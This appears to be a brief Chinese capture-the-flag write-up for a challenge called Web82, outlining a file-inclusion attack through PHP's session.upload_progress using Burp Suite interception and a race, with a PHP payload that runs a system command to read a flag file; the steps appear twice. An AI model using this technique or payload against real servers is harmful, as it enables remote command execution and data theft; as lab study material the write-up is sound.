Web82
利用 session.upload_progress 包含文件漏洞
修改url地址,修改命令
上传文件bp抓包
添加cookie,清除参数
?file=/tmp/sess_exp
抓包发送到攻击模块
开始攻击
<?php system('cat fl0g.php'); ?>
微信扫一扫
修改url地址,修改命令
上传文件bp抓包
添加cookie,清除参数
?file=/tmp/sess_exp
抓包发送到攻击模块
开始攻击
<?php system('cat fl0g.php'); ?>
相关推荐